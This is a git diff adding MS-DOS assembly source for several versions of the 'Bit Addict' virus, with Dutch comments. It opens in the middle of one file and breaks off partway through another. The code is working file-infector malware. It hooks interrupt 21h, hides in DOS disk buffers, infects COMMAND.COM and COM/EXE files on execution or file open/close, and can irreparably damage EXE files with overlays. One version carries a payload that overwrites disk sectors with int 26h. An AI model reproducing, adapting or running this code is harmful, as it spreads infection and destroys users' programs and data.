geheugen te zetten + push cx + push dx + push si + push di + push ds + push es + call Init + jnc @@11 + call DebugOn + mov ah,52h ; lees het adres van de eerste + call DOS ; disk-buffer + push bx + mov ah,30h + call DOS + pop di + call DebugOff + cmp al,2 ; dit werkt niet op dos 1.x + jb @@11 + cmp al,3 ; voor dos 2.x op di+13h en + adc di,12h ; voor dos 3+ op di+12h + lds si,es:[di] + or si,si + jne @@11 + push di + movsw ; reserveer 1e buffer + movsw + pop di + mov cx,ds + mov dx,ds + call GetBuffer ; reserveer 2e buffer + jc @@10 + call GetBuffer ; reserveer 3e buffer + jc @@10 + call CopyBitAddict ; Copieer bit addict naar + pop es ; de buffers + push es ; Infecteer bestand in de + call InfectComspec ; comspec + jmp @@11 +@@10: call RestoreBuffers +@@11: pop es ; ga nu verder met het + pop ds ; programma voor Bit Addict + pop di + pop si + pop dx + pop cx + pop bx + pop ax + cli + mov ss,cs:OldSS + mov sp,cs:OldSP + sti + jmp cs:OldCSIP + +GetBuffer: ; reserveer een buffer + push di ; cx = eerste buffer + push es ; dx = laatste buffer + jmp @@21 +@@20: push ds + pop es + mov di,si +@@21: lds si,es:[di] + or si,si + jne @@23 + mov ax,ds + sub ax,dx + cmp ax,21h + jne @@22 + mov dx,ds + movsw + movsw + clc + jmp @@24 +@@22: mov ax,ds + sub ax,cx + neg ax + cmp ax,21h + jne @@20 + mov cx,ds + movsw + movsw + clc + jmp @@24 +@@23: stc +@@24: pop es + pop di + ret + +CopyBitAddict: + push cs ; copieer Bit Addict naar de + pop ds ; gereserveerde buffers + mov es,cx + xor si,si + xor di,di + mov cx,CodeSize2 + cld + rep movsb + xor ax,ax ; leid interrupt 21h om naar + mov ds,ax ; Bit Addict + mov word ptr ds:[84h],offset NewInt21 + mov word ptr ds:[86h],es + ret + +InfectComspec: + mov es,es:[2ch] ; lees environment segment + xor di,di + push cs ; zoek naar de comspec + pop ds ; variabele + mov si,offset Comspec +@@30: push si + push di + mov cx,8 + cld + repe cmpsb + pop di + pop si + je @@31 + xor al,al + mov cx,-1 + cld + repne scasb + cmp byte ptr es:[di],0 + jne @@30 + jmp @@32 +@@31: push es ; infecteer de COMMAND.COM of + pop ds ; andere command interpreter + lea dx,[di+8] + push cs:OldIP + push cs:OldCS + push cs:OldSP + push cs:OldSS + call Infect + pop cs:OldSS + pop cs:OldSP + pop cs:OldCS + pop cs:OldIP +@@32: ret + +RestoreBuffers: + mov ax,cx +@@40: cmp ax,dx + je @@42 + mov ds,ax + add ax,21h + mov word ptr ds:[0],0 + mov word ptr ds:[2],ax + jmp @@40 +@@42: mov ds,dx + mov ax,es:[di] + mov ds:[0],ax + mov word ptr es:[di],0 + mov ax,es:[di+2] + mov ds:[2],ax + mov es:[di+2],cx + ret + +DebugOn:push ax + push ds + xor ax,ax + mov ds,ax + cli + mov ax,ds:[4h] + mov word ptr cs:OldInt1[0],ax + mov ax,ds:[6h] + mov word ptr cs:OldInt1[2],ax + mov word ptr ds:[4],offset NewInt1 + mov word ptr ds:[6],cs + mov ax,ds:[84h] + mov word ptr cs:OldInt21[0],ax + mov ax,ds:[86h] + mov word ptr cs:OldInt21[2],ax + mov word ptr cs:DosInt21[0],0 + mov word ptr cs:DosInt21[2],0 + sti + pop ds + pop ax + pushf + push cs + call SetTrap + ret + +SetTrap:push bp + mov bp,sp + or word ptr ss:[bp+6],100h + pop bp + iret + +DebugOff: + pushf + push cs + call ClearTrap + push ax + push ds + xor ax,ax + mov ds,ax + cli + mov ax,word ptr cs:OldInt1[0] + mov ds:[4],ax + mov ax,word ptr cs:OldInt1[2] + mov ds:[6],ax + sti + pop ds + pop ax + ret + +ClearTrap: + push bp + mov bp,sp + and word ptr ss:[bp+6],0feffh + pop bp + iret + +Init: push cs + pop ds + cmp OldSignature,5a4dh + je @@50 + mov si,offset SavedCode ; herstel begin van het + mov di,100h ; com-programma + mov cx,10h + cld + rep movsb + mov OldSS,ss ; bewaar de waarden van + mov OldSP,sp ; ss,sp,cs en ip + sub OldSP,10h + mov OldCS,es + mov OldIP,100h + jmp @@51 +@@50: mov ax,es ; bereken de waarden van + add ax,10h ; ss,sp,cs en ip + add OldCS,ax + add OldSS,ax +@@51: mov ax,4b40h ; controleer of Bit Addict al + int 21h ; in het geheugen aanwezig is + jc @@52 + mov ds,ax + push cs ; vergelijk identificatie + pop ds + mov si,offset ID + mov di,si + mov cx,ID_Length + cld + repe cmpsb + je @@52 + stc +@@52: ret + +NewInt1:push bp + mov bp,sp + push ax + mov ax,word ptr cs:DosInt21[0] + or ax,word ptr cs:DosInt21[2] + jnz @@60 + cmp word ptr ss:[bp+4],300h + jae @@61 + mov ax,ss:[bp+2] + mov word ptr cs:DosInt21[0],ax + mov ax,ss:[bp+4] + mov word ptr cs:DosInt21[2],ax +@@60: and word ptr ss:[bp+6],0feffh +@@61: pop ax + pop bp + iret + +DOS: push ax + mov ax,word ptr cs:DosInt21[0] + or ax,word ptr cs:DosInt21[2] + pop ax + jnz @@62 + pushf + call cs:OldInt21 + ret +@@62: pushf + call cs:DosInt21 + ret + +NewInt21: ; Het nieuwe interrupt 21h + pushf + cmp ax,4b40h + je InstallCheck + cmp ah,4bh + je Exec +EOI: popf + jmp cs:OldInt21 + +InstallCheck: ; Zo kan bit addict weten + mov ax,cs ; dat er al een andere copy + popf ; aanwezig is + clc + retf 2 + +ComHeader: ; dit stukje wordt voor een + mov ax,cs ; COM-file geplaatst + add ax,0100h +OldSize equ this word-2 + push ax + mov ax,offset Begin + push ax + retf + +Exec: call Infect ; functie 4bh, infecteer eerste + jmp EOI ; met Bit Addict + +Infect: push ax ; Infecteer een file + push bx + push cx + push si + push di + push bp + push es + mov ax,4300h ; lees attributen en bewaar + call DOS ; ze + jmpc @@82 + push cx + push dx + push ds + test cx,1 + jz @@71 + mov ax,4301h ; set Read-Only attribuut + and cx,0fffeh ; op nul + call DOS + jmpc @@81 +@@71: mov ax,3d02h ; open de file + call DOS + jmpc @@81 + mov bx,ax + mov ax,5700h ; lees de datum en tijd en + call DOS ; bewaar ze + jmpc @@80 + push cx + push dx + push cs ; ds=es=cs + pop ds + push cs + pop es + mov ah,3fh ; lees de header van de file + mov cx,HeaderLength + lea dx,Header + call DOS + jmpc @@79 + cmp ax,HeaderLength + jne @@74 + cmp Signature,5a4dh + jne @@72 + mov ax,ExeCS ; zoek de plaats waar de + add ax,HeaderSize ; identificatie zou moeten + mov dx,10h ; staan voor exe-files + mul dx + add ax,offset ID + adc dx,0 + jmp @@73 +@@72: mov ax,ComCS ; doe hetzelfde maar dan voor + mov dx,10h ; een com-file + sub ax,dx + mul dx + add ax,offset ID + adc dx,0 +@@73: mov cx,dx + mov dx,ax + mov ax,4200h + call DOS + mov ah,3fh ; lees de ID indien aanwezig + mov cx,ID_Length + lea dx,ID_Check + call DOS + lea si,ID_Check ; controleer of ID aanwezig + lea di,ID ; is + mov cx,ID_Length + cld + repe cmpsb + jmpe @@79 ; als ID aanwezig is, stop dan + cmp Signature,5a4dh + je @@76 +@@74: mov ax,4202h ; infecteer com-files + xor cx,cx ; ga naar het einde van de file + xor dx,dx + call DOS + mov cx,10h ; aanpassen van de com-header + div cx ; aan deze com-file + or dx,dx + je @@75 + push ax + mov ah,40h + mov cx,10h + sub cx,dx + xor dx,dx + call DOS + pop ax + jmpc @@79 + inc ax +@@75: add ax,10h + mov OldSize,ax + mov si,offset Header ; bewaar het eerste deel van + mov di,offset SavedCode ; het programma + mov cx,10h + cld + rep movsb + mov ah,40h ; schrijf het virus achter het + mov cx,CodeSize1 ; programma + xor dx,dx + call DOS + jmpc @@79 + mov ax,4200h ; ga naar het begin van de file + xor cx,cx + xor dx,dx + call DOS + jmpc @@79 + mov ah,40h ; overschrijf het begin van het + mov cx,10h ; programma met de com-header + mov dx,offset ComHeader + call DOS + jmp @@79 +@@76: mov OldSignature,5a4dh ; infecteer exe-files + mov ax,ExeIP ; bewaar de oude waarden van + mov OldIP,ax ; cs:ip en ss:sp + mov ax,ExeCS + mov OldCS,ax + mov ax,ExeSP + mov OldSP,ax + mov ax,ExeSS + mov OldSS,ax + mov ax,PageCount ; pas de waarden van cs:ip en + dec ax ; ss:sp aan, en pas ook de + mov cx,200h ; lengte van de file aan + mul cx + add ax,PartPage + adc dx,0 + mov cx,dx + mov dx,ax + mov ax,4200h + call DOS + mov cx,10h + div cx + or dx,dx + je @@77 + push ax + push dx + mov ah,40h + mov cx,10h + sub cx,dx + xor dx,dx + call DOS + pop dx + pop ax + jc @@79 + inc ax +@@77: sub ax,HeaderSize + mov ExeCS,ax + mov ExeIP,offset Begin + add ax,CodeSizePara2 + mov ExeSS,ax + mov ExeSP,200h + mov ax,MinMem + cmp ax,20h+CodeSizePara2-CodeSizePara1 + jae @@78 + mov ax,20h +@@78: mov MinMem,ax + mov ax,PartPage + add ax,CodeSize1 + add ax,dx + mov cx,200h + xor dx,dx + div cx + add PageCount,ax + mov PartPage,dx + mov ah,40h ; schrijf het virus achter + mov cx,CodeSize1 ; de exe-file, indien de + xor dx,dx ; exe-file overlays bevat dan + call DOS ; worden ze overschreven en is + jc @@79 ; de exe-file onherstelbaar + mov ax,4200h ; beschadigd + xor cx,cx + xor dx,dx ; ga naar het begin van de file + call DOS + jc @@79 + mov ah,40h ; schrijf de nieuwe exe-header + mov cx,HeaderLength ; over de oude heen. + mov dx,offset Header + call DOS +@@79: pop dx ; herstel de datum van de file + pop cx + mov ax,5701h + call DOS +@@80: mov ah,3eh ; sluit de file + call DOS +@@81: pop ds ; herstel de attributen van de + pop dx ; file + pop cx + test cx,1 + jz @@82 + mov ax,4301h + call DOS +@@82: pop es ; herstel de waarden van de + pop bp ; registers en keer terug + pop di ; naar het oude interrupt 21 + pop si + pop cx + pop bx + pop ax + ret + +CodeSize1 equ $-BeginCode +CodeSizePara1 equ ($-BeginCode+0fh) / 10h + +Header dw 14h dup(?) +ComCS equ Header[ComHeader-OldSize] ; Com file + +Signature equ Header[0h] ; Exe file +PartPage equ Header[2h] +PageCount equ Header[4h] +ReloCount equ Header[6h] +HeaderSize equ Header[8h] +MinMem equ Header[0ah] +MaxMem equ Header[0ch] +ExeSS equ Header[0eh] +ExeSP equ Header[10h] +ChkSum equ Header[12h] +ExeIP equ Header[14h] +ExeCS equ Header[16h] +TablOfs equ Header[18h] +OverlayNr equ Header[1ah] +HeaderLength equ 1ch + +ID_Check db ID_Length dup(?) + +DosInt21 dd ? +OldInt21 dd ? +OldInt1 dd ? + +CodeSize2 equ $-BeginCode +CodeSizePara2 equ ($-BeginCode+0fh) / 10h + +cseg ends + +sseg segment stack + db 200h dup(?) +sseg ends + +end Begin \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.addict7.asm b/MSDOS/Virus.MSDOS.Unknown.addict7.asm new file mode 100644 index 00000000..8c8e5563 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.addict7.asm @@ -0,0 +1,813 @@ +; Bit Addict Versie 3 + +;----------------------------------------------------------------------------- +;----- ----- +;----- Macros en andere hulpmiddellen ----- +;----- ----- +;----------------------------------------------------------------------------- + +; de macro's hieronder worden gebruikt wanneer een conditionele sprong groter +; wordt dan 128 bytes en er dus een foutmelding komt + +jmpc macro Dest ; vervanging voor jc + local @@00 + + jnc @@00 + jmp Dest +@@00: + endm + +jmpnc macro Dest ; vervanging voor jnc + local @@00 + + jc @@00 + jmp Dest +@@00: + endm + +jmpe macro Dest ; vervanging voor je + local @@00 + + jnz @@00 + jmp Dest +@@00: + endm + +jmpne macro Dest ; vervanging voor jne + local @@00 + + jz @@00 + jmp Dest +@@00: + endm + +eseg segment + mov ax,4c00h ; exit + int 21h +eseg ends + +;----------------------------------------------------------------------------- +;----- ----- +;----- Begin van het Bit Addict virus ----- +;----- ----- +;----------------------------------------------------------------------------- + +cseg segment + assume cs:cseg,ds:cseg,es:cseg + org 0 + +CodeSize equ CodeEnd-BeginCode +CodeSizePara equ (CodeEnd-BeginCode+0fh) / 10h +VirusSize equ VirusEnd-BeginCode +VirusSizePara equ (VirusEnd-BeginCode+0fh) / 10h +HeaderLength equ 18h + +BeginCode equ $ +SavedCode equ this byte ; gegevens over het +OldSignature dw 5a4dh ; programma voor het virus +OldCSIP equ this dword +OldIP dw 0 +OldCS dw 0 +OldSP dw 200h +OldSS dw 0 + dw 3 dup(0) + +Comspec db 'COMSPEC=' ; comspec environment variabele + ; om de command.com te vinden + +ID db 'Bit Addict Version 3' +ID_Length equ $-offset ID + +Count dw 0 +Bios db 10h dup(0) +ChkSum dw 0 + +Begin: push ax ; Programma om het virus + push bx ; in het geheugen te zetten + push cx + push dx + push si + push di + push ds + push es + call Init + jnc @@12 + call BiosCheck + push cs + pop es + xor al,al + mov cx,VirusSize-CodeSize + mov di,CodeSize + cld + rep stosb + call DebugOn + mov ah,52h ; lees het adres van de eerste + call DOS ; disk-buffer + push bx + mov ah,30h + call DOS + pop di + call DebugOff + cmp al,2 ; dit werkt niet op dos 1.x + jb @@12 + cmp al,3 ; voor dos 2.x op di+13h en + adc di,12h ; voor dos 3+ op di+12h + lds si,es:[di] + or si,si + jne @@12 + push di + cld + movsw ; reserveer 1e buffer + movsw + pop di + mov cx,ds + mov dx,ds + mov bx,3 +@@10: call GetBuffer ; reserveer 2e,3e en 4e + jc @@11 ; buffer + dec bx + jne @@10 + call CopyBitAddict ; Copieer bit addict naar + pop es ; de buffers + push es ; Infecteer bestand in de + call InfectComspec ; comspec + jmp short @@12 +@@11: call RestoreBuffers +@@12: pop es ; ga nu verder met het + pop ds ; programma voor Bit Addict + pop di + pop si + pop dx + pop cx + pop bx + pop ax + cli + mov ss,cs:OldSS + mov sp,cs:OldSP + sti + jmp cs:OldCSIP + +GetBuffer: ; reserveer een buffer + push di ; cx = eerste buffer + push es ; dx = laatste buffer + jmp short @@21 +@@20: push ds + pop es + mov di,si +@@21: lds si,es:[di] + or si,si + jne @@23 + mov ax,ds + sub ax,dx + cmp ax,21h + jne @@22 + mov dx,ds + cld + movsw + movsw + clc + jmp short @@24 +@@22: mov ax,ds + sub ax,cx + neg ax + cmp ax,21h + jne @@20 + mov cx,ds + cld + movsw + movsw + clc + jmp short @@24 +@@23: stc +@@24: pop es + pop di + ret + +CopyBitAddict: + push cs ; copieer Bit Addict naar de + pop ds ; gereserveerde buffers + mov es,cx + xor si,si + xor di,di + mov cx,VirusSize + cld + rep movsb + xor ax,ax ; leid interrupt 21h om naar + mov ds,ax ; Bit Addict + mov word ptr ds:[84h],offset NewInt21 + mov word ptr ds:[86h],es + ret + +InfectComspec: + mov es,es:[2ch] ; lees environment segment + xor di,di + push cs ; zoek naar de comspec + pop ds ; variabele + mov si,offset Comspec +@@30: push si + push di + mov cx,8 + cld + repe cmpsb + pop di + pop si + je @@31 + xor al,al + mov cx,-1 + cld + repne scasb + cmp byte ptr es:[di],0 + jne @@30 + jmp short @@32 +@@31: push es ; infecteer de COMMAND.COM of + pop ds ; andere command interpreter + lea dx,[di+8] + push cs:OldIP + push cs:OldCS + push cs:OldSP + push cs:OldSS + call Infect + pop cs:OldSS + pop cs:OldSP + pop cs:OldCS + pop cs:OldIP +@@32: ret + +RestoreBuffers: + mov ax,cx +@@40: cmp ax,dx + je @@42 + mov ds,ax + add ax,21h + mov word ptr ds:[0],0 + mov word ptr ds:[2],ax + jmp short @@40 +@@42: mov ds,dx + mov ax,es:[di] + mov ds:[0],ax + mov word ptr es:[di],0 + mov ax,es:[di+2] + mov ds:[2],ax + mov es:[di+2],cx + ret + +DebugOn:push ax + push ds + xor ax,ax + mov ds,ax + cli + mov ax,ds:[4h] + mov word ptr cs:OldInt1[0],ax + mov ax,ds:[6h] + mov word ptr cs:OldInt1[2],ax + mov word ptr ds:[4],offset NewInt1 + mov word ptr ds:[6],cs + mov ax,ds:[84h] + mov word ptr cs:OldInt21[0],ax + mov ax,ds:[86h] + mov word ptr cs:OldInt21[2],ax + mov word ptr cs:DosInt21[0],0 + mov word ptr cs:DosInt21[2],0 + sti + pop ds + pop ax + pushf + push cs + call SetTrap + ret + +SetTrap:push bp + mov bp,sp + or word ptr ss:[bp+6],100h + pop bp + iret + +DebugOff: + pushf + push cs + call ClearTrap + push ax + push ds + xor ax,ax + mov ds,ax + cli + mov ax,word ptr cs:OldInt1[0] + mov ds:[4],ax + mov ax,word ptr cs:OldInt1[2] + mov ds:[6],ax + sti + pop ds + pop ax + ret + +ClearTrap: + push bp + mov bp,sp + and word ptr ss:[bp+6],0feffh + pop bp + iret + +Init: push cs + pop ds + cmp OldSignature,5a4dh + je @@50 + mov si,offset SavedCode ; herstel begin van het + mov di,100h ; com-programma + mov cx,10h + cld + rep movsb + mov OldSS,ss ; bewaar de waarden van + mov OldSP,sp ; ss,sp,cs en ip + sub OldSP,10h + mov OldCS,es + mov OldIP,100h + jmp short @@51 +@@50: mov ax,es ; bereken de waarden van + add ax,10h ; ss,sp,cs en ip + add OldCS,ax + add OldSS,ax +@@51: mov ax,4b40h ; controleer of Bit Addict al + int 21h ; in het geheugen aanwezig is + jc @@52 + mov ds,ax + push cs ; vergelijk identificatie + pop ds + mov si,offset ID + mov di,si + mov cx,ID_Length + cld + repe cmpsb + je @@52 + stc +@@52: ret + +BiosCheck: + mov ax,0f000h + mov ds,ax + push cs + pop es + xor si,si + mov di,offset Bios + mov cx,10h + cld + repe cmpsb + je @@54 + mov ax,cs:Count + inc ax + cmp ax,100h + jb @@53 + call BitAddict +@@53: mov cs:Count,ax + xor si,si + mov di,offset Bios + mov cx,10h + rep movsb +@@54: ret + +BitAddict: + xor dx,dx +@@55: push dx + mov ax,3 + xor bx,bx + mov cx,40h + int 26h + pop ax + pop dx + add dx,40h + or dx,dx + jne @@55 + ret + +NewInt1:push bp + mov bp,sp + push ax + mov ax,word ptr cs:DosInt21[0] + or ax,word ptr cs:DosInt21[2] + jnz @@60 + cmp word ptr ss:[bp+4],300h + jae @@61 + mov ax,ss:[bp+2] + mov word ptr cs:DosInt21[0],ax + mov ax,ss:[bp+4] + mov word ptr cs:DosInt21[2],ax +@@60: and word ptr ss:[bp+6],0feffh +@@61: pop ax + pop bp + iret + +DOS: push ax + mov ax,word ptr cs:DosInt21[0] + or ax,word ptr cs:DosInt21[2] + pop ax + jnz @@62 + pushf + call cs:OldInt21 + ret +@@62: pushf + call cs:DosInt21 + ret + +InstallCheck: ; Zo kan bit addict weten + mov ax,cs ; dat er al een andere copy + popf ; aanwezig is + clc + retf 2 + +Exec: call CheckExtension ; functie 4bh, infecteer eerst + jc EOI ; met Bit Addict + mov byte ptr cs:Active,1 + call Infect + mov byte ptr cs:Active,0 + jmp short EOI + +NewInt21: ; Het nieuwe interrupt 21h + pushf + cmp byte ptr cs:Active,0 + jne EOI + cmp ah,3dh + je Open + cmp ah,3ch + je Open + cmp ah,3eh + je Close + cmp ax,4b40h + je InstallCheck + cmp ah,4bh + je Exec +EOI: popf + jmp cs:OldInt21 + +Open: call CheckExtension + jc EOI + mov byte ptr cs:Active,1 + call cs:OldInt21 + jc @@92 + pushf + push ax + push cx + push si + push di + push es + push cs + pop es + mov si,dx + mov di,offset File1 + cmp word ptr es:[di],0 + je @@90 + mov di,offset File2 + cmp word ptr es:[di],0 + jne @@91 +@@90: cld + stosw + mov cx,70 + rep movsb +@@91: pop es + pop di + pop si + pop cx + pop ax + popf +@@92: mov byte ptr cs:Active,0 + retf 2 + +Close: cmp bx,cs:File1 + je @@93 + cmp bx,cs:File2 + jne EOI + mov byte ptr cs:Active,1 + call cs:OldInt21 + push si + mov si,offset File2 + jmp short @@94 +@@93: mov byte ptr cs:Active,1 + call cs:OldInt21 + push si + mov si,offset File1 +@@94: jc @@95 + pushf + push dx + push ds + push cs + pop ds + lea dx,[si+2] + call Infect + pop ds + pop dx + popf +@@95: mov word ptr cs:[si],0 + mov byte ptr cs:Active,0 + pop si + retf 2 + +CheckExtension: + push ax + push cx + push si + push di + push es + push ds + pop es + mov di,dx + xor al,al + mov cx,70 + cld + repne scasb + jne @@65 + std + mov al,'.' + neg cx + add cx,70 + std + repne scasb + jne @@65 + lea si,[di+2] + cld + lodsw + and ax,0dfdfh + cmp ax,5845h ; 'EX' + je @@64 + cmp ax,4f43h ; 'CO' + jne @@65 + lodsb + and al,0dfh + cmp al,4dh ; 'M' + je @@66 + jmp short @@65 +@@64: lodsb + and al,0dfh + cmp al,45h ; 'E' + je @@66 +@@65: stc + jmp short @@67 +@@66: clc +@@67: pop es + pop di + pop si + pop cx + pop ax + ret + +ComHeader: ; dit stukje wordt voor een + mov ax,cs ; COM-file geplaatst + add ax,0100h +OldSize equ this word-2 + push ax + mov ax,offset Begin + push ax + retf + +Infect: push ax ; Infecteer een file + push bx + push cx + push si + push di + push bp + push es + mov ax,4300h ; lees attributen en bewaar + call DOS ; ze + jmpc @@83 + push cx + push dx + push ds + test cx,1 + jz @@71 + mov ax,4301h ; set Read-Only attribuut + and cx,0fffeh ; op nul + call DOS + jmpc @@82 +@@71: mov ax,3d02h ; open de file + call DOS + jmpc @@82 + mov bx,ax + mov ax,5700h ; lees de datum en tijd en + call DOS ; bewaar ze + jmpc @@81 + push cx + push dx + push cs ; ds=es=cs + pop ds + push cs + pop es + mov ah,3fh ; lees de header van de file + mov cx,HeaderLength + mov dx,offset Header + call DOS + jmpc @@80 + cmp ax,HeaderLength + jne @@75 + cmp Signature,5a4dh + jne @@72 + mov ax,ExeCS ; zoek de plaats waar de + add ax,HeaderSize ; identificatie zou moeten + mov dx,10h ; staan voor exe-files + mul dx + add ax,offset ID + adc dx,0 + jmp short @@73 +@@72: mov ax,ComCS ; doe hetzelfde maar dan voor + mov dx,10h ; een com-file + sub ax,dx + mul dx + add ax,offset ID + adc dx,0 +@@73: mov cx,dx + mov dx,ax + mov ax,4200h + call DOS + jc @@74 + mov ah,3fh ; lees de ID indien aanwezig + mov cx,ID_Length + mov dx,offset ID_Check + call DOS + jc @@74 + cmp ax,ID_Length + jne @@74 + mov si,offset ID_Check ; controleer of ID aanwezig + mov di,offset ID ; is + mov cx,ID_Length + cld + repe cmpsb + jmpe @@80 ; als ID aanwezig is, stop dan +@@74: cmp Signature,5a4dh + je @@77 +@@75: mov ax,4202h ; infecteer com-files + xor cx,cx ; ga naar het einde van de file + xor dx,dx + call DOS + mov cx,10h ; aanpassen van de com-header + div cx ; aan deze com-file + or dx,dx + je @@76 + push ax + mov ah,40h + mov cx,10h + sub cx,dx + xor dx,dx + call DOS + pop ax + jmpc @@80 + inc ax +@@76: add ax,10h + mov OldSize,ax + mov si,offset Header ; bewaar het eerste deel van + mov di,offset SavedCode ; het programma + mov cx,10h + cld + rep movsb + mov ah,40h ; schrijf het virus achter het + mov cx,CodeSize ; programma + xor dx,dx + call DOS + jmpc @@80 + mov ax,4200h ; ga naar het begin van de file + xor cx,cx + xor dx,dx + call DOS + jmpc @@80 + mov ah,40h ; overschrijf het begin van het + mov cx,10h ; programma met de com-header + mov dx,offset ComHeader + call DOS + jmp @@80 +@@77: mov OldSignature,5a4dh ; infecteer exe-files + mov ax,ExeIP ; bewaar de oude waarden van + mov OldIP,ax ; cs:ip en ss:sp + mov ax,ExeCS + mov OldCS,ax + mov ax,ExeSP + mov OldSP,ax + mov ax,ExeSS + mov OldSS,ax + mov ax,PageCount ; pas de waarden van cs:ip en + dec ax ; ss:sp aan, en pas ook de + mov cx,200h ; lengte van de file aan + mul cx + add ax,PartPage + adc dx,0 + mov cx,dx + mov dx,ax + mov ax,4200h + call DOS + jmpc @@80 + push ax + push dx + mov ah,3fh + mov cx,80h + mov dx,offset Buffer + int 21h + mov cx,ax + pop dx + pop ax + jmpc @@80 + cmp cx,80h + jmpe @@80 + add ax,cx + adc dx,0 + mov cx,10h + div cx + or dx,dx + je @@78 + push ax + push dx + mov ah,40h + mov cx,10h + sub cx,dx + xor dx,dx + call DOS + pop dx + pop ax + jc @@80 + inc ax +@@78: sub ax,HeaderSize + mov ExeCS,ax + mov ExeIP,offset Begin + add ax,VirusSizePara + mov ExeSS,ax + mov ExeSP,200h + mov ax,MinMem + cmp ax,20h+VirusSizePara-CodeSizePara + jae @@79 + mov ax,20h +@@79: mov MinMem,ax + mov ax,PartPage + add ax,CodeSize + add ax,dx + mov cx,200h + xor dx,dx + div cx + add PageCount,ax + mov PartPage,dx + mov ah,40h ; schrijf het virus achter + mov cx,CodeSize ; de exe-file, indien de + xor dx,dx ; exe-file overlays bevat dan + call DOS ; worden ze overschreven en is + jc @@80 ; de exe-file onherstelbaar + mov ax,4200h ; beschadigd + xor cx,cx + xor dx,dx ; ga naar het begin van de file + call DOS + jc @@80 + mov ah,40h ; schrijf de nieuwe exe-header + mov cx,HeaderLength ; over de oude heen. + mov dx,offset Header + call DOS +@@80: pop dx ; herstel de datum van de file + pop cx + mov ax,5701h + call DOS +@@81: mov ah,3eh ; sluit de file + call DOS +@@82: pop ds ; herstel de attributen van de + pop dx ; file + pop cx + test cx,1 + jz @@83 + mov ax,4301h + call DOS +@@83: pop es ; herstel de waarden van de + pop bp ; registers en keer terug + pop di ; naar het oude interrupt 21 + pop si + pop cx + pop bx + pop ax + ret + +CodeEnd equ $ + +Header dw HeaderLength/2 dup(?) +ComCS equ Header[OldSize-Comheader] ; Com file + +Signature equ Header[0h] ; Exe file +PartPage equ Header[2h] +PageCount equ Header[4h] +HeaderSize equ Header[8h] +MinMem equ Header[0ah] +MaxMem equ Header[0ch] +ExeSS equ Header[0eh] +ExeSP equ Header[10h] +ExeIP equ Header[14h] +ExeCS equ Header[16h] + +ID_Check db ID_Length dup(?) + +Active db ? + +DosInt21 dd ? +OldInt21 dd ? +OldInt1 dd ? + +File1 dw 36 dup(?) +File2 dw 36 dup(?) + +Buffer db 80h dup(?) + +VirusEnd equ $ + +cseg ends + +sseg segment stack + db 200h dup(?) +sseg ends + +end Begin \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.addict8.asm b/MSDOS/Virus.MSDOS.Unknown.addict8.asm new file mode 100644 index 00000000..fa286b2a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.addict8.asm @@ -0,0 +1,793 @@ +; Bit Addict Versie 4 + +;----------------------------------------------------------------------------- +;----- ----- +;----- Macros en andere hulpmiddellen ----- +;----- ----- +;----------------------------------------------------------------------------- + +; de macro's hieronder worden gebruikt wanneer een conditionele sprong groter +; wordt dan 128 bytes en er dus een foutmelding komt + +dfn macro Num1,Num2 + db Num1 + dw offset Num2 + endm + +jmpc macro Dest ; vervanging voor jc + local @@00 + + jnc @@00 + jmp Dest +@@00: + endm + +jmpnc macro Dest ; vervanging voor jnc + local @@00 + + jc @@00 + jmp Dest +@@00: + endm + +jmpe macro Dest ; vervanging voor je + local @@00 + + jnz @@00 + jmp Dest +@@00: + endm + +jmpne macro Dest ; vervanging voor jne + local @@00 + + jz @@00 + jmp Dest +@@00: + endm + +eseg segment + mov ax,4c00h ; exit + int 21h +eseg ends + +;----------------------------------------------------------------------------- +;----- ----- +;----- Begin van het Bit Addict virus ----- +;----- ----- +;----------------------------------------------------------------------------- + +cseg segment + assume cs:cseg,ds:cseg,es:cseg + org 0 + +BeginCode equ $ ; begin van het virus + +CodeSize equ CodeEnd-BeginCode ; de grootte van het +CodeSizePara equ (CodeEnd-BeginCode+0fh) / 10h ; virus achter een file + +VirusSize equ VirusEnd-BeginCode ; de grootte van het +VirusSizePara equ (VirusEnd-BeginCode+0fh) / 10h ; virus in het geheugen + +HeaderLength equ 18h ; grootte van een + +SavedCode equ this byte ; gegevens over het +OldSignature dw 5a4dh ; programma voor het +OldCSIP equ this dword ; virus +OldIP dw 0 +OldCS dw 0 +OldSP dw 200h +OldSS dw 0 +OldPartPage dw 0 +OldPageCount dw 0 + +Begin: push ax ; Programma om het virus + push ds ; resident te laten blijven + push es ; en om de comspec te + call Init ; infecteren + jnc @@12 + call BiosCheck ; Als bit addict op een andere + push cs ; computer draait wordt er een + pop es ; teller verhoogt. + xor al,al + mov cx,VirusSize-CodeSize ; zet alle variabelen op nul + mov di,CodeSize + cld + rep stosb ; debug interrupt 21h om het + call DebugOn ; orginele interrupt te vinden + mov ah,52h + call DOS ; lees het adres van de eerste + push bx ; disk-buffer + mov ah,30h + call DOS + pop di + call DebugOff + cmp al,2 ; dit werkt niet op dos 1.x + jb @@12 + cmp al,3 ; voor dos 2.x op di+13h en + adc di,12h ; voor dos 3+ op di+12h + lds si,es:[di] + or si,si + jne @@12 + push di + cld + movsw ; reserveer 1e buffer + movsw + pop di + mov cx,ds + mov dx,ds + mov bx,3 +@@10: call GetBuffer ; reserveer 2e,3e en 4e + jc @@11 ; buffer + dec bx + jne @@10 + call CopyBitAddict ; Copieer bit addict naar + pop es ; de buffers + push es ; Infecteer bestand in de + call InfectComspec ; comspec + jmp short @@12 +@@11: call RestoreBuffers ; voor als het fout gaat +@@12: pop es + pop ds ; ga nu verder met het + pop ax ; programma voor Bit Addict + cli + mov ss,cs:OldSS + mov sp,cs:OldSP + sti + jmp cs:OldCSIP + + +Comspec db 'COMSPEC=' ; comspec environment variabele + ; om de command.com te vinden + +ID dw 0DEADh ; hier wordt het virus herkend + ; als het in het geheugen staat + +Count dw 0 ; In deze variabele staat op + ; hoeveel verschillende + ; computers het virus is + ; geweest +Bios db 10h dup(0) ; Gegevens over de bios, + ; door dit te vergelijken met + ; de bios kan het virus weten + ; of het virus op een andere + ; computer draait + +GetBuffer: ; reserveer een buffer + push di ; cx = eerste buffer + push es ; dx = laatste buffer + jmp short @@21 +@@20: push ds ; zoek een buffer die naast een + pop es ; gereserveerde buffer ligt, dus + mov di,si ; 21h voor cx, of 21h na dx. +@@21: lds si,es:[di] + or si,si + jne @@23 + mov ax,ds + sub ax,dx + cmp ax,21h + jne @@22 + mov dx,ds + cld + movsw + movsw + 